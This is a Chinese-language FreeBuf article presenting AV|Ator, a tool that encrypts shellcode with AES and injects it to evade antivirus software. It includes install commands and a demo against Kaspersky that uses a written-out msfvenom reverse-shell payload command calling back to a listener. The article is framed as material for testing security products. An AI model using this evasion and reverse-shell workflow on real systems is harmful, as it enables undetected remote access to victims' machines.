freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

AV|Ator:一款功能强大的AV检测绕过工具
2023-04-20 01:23:47
所属地 广西


关于AV|Ator

AV|Ator是一款功能强大的AV检测绕过工具,从本质上来说,该工具是一个后门生成实用工具,该工具使用了加密技术和注入技术来尝试绕过反病毒产品的检测。因此,广大研究人员可以使用该工具来测试目标反病毒产品的安全检测能力。

技术实现

1、该工具使用了AES加密算法来对给定的Shellcode进行加密处理;

2、该工具可以生成一个包含了加密Payload的可执行文件;

3、最终的Shellcode可以使用各种不同的注入技术在目标操作系统中执行注入和解密;

工具安装

Windows安装

广大研究人员可以直接点击【这里】下载预编译的项目可执行文件。

除此之外,我们也可以使用下列命令将该项目源码克隆至本地:

git clone https://github.com/Ch0pin/AVIator.git

并使用C#开发环境来对项目代码进行本地编译。

Linux安装

首先,我们需要根据Linux操作系统发行版版本来安装Mono,然后下载并运行项目代码即可。

下面以Kali为例:

git clone https://github.com/Ch0pin/AVIator.git

cd AVIator

root@kali# apt install mono-devel

root@kali# mono aviator.exe

工具使用

该工具提供了一个表单,其中包含三个主要的输入参数:

1、加密密钥,用于对Shellcode进行加密;

2、IV向量,用于AES加密;

3、Shellcode;

工具使用演示

在下面的工具使用演示样例中,我们将尝试在一台Windows 10 x64主机上绕过最新版本的卡巴斯基反病毒产品。

首先,我们使用msfvenom来创建Payload:

msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp

接下来,对AV|Ator执行下列操作:

目标操作系统架构:x64;

注入技术:线程劫持(Shellcode Arch:x64,OS Arch:x64);;

目标程序:explorer(默认);

然后在我们的设备上设置好监听器,然后在目标设备上运行生成的可执行文件即可。

工具运行截图

许可证协议

本项目的开发与发布遵循GPL-3.0开源许可证协议。

项目地址

AV|Ator:【GitHub传送门

参考资料

https://en.wikipedia.org/wiki/Ator

https://attack.mitre.org/techniques/T1055/

# 绕过 # 反病毒 # 绕过反病毒软件 # Bypass AV # 反病毒监测
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录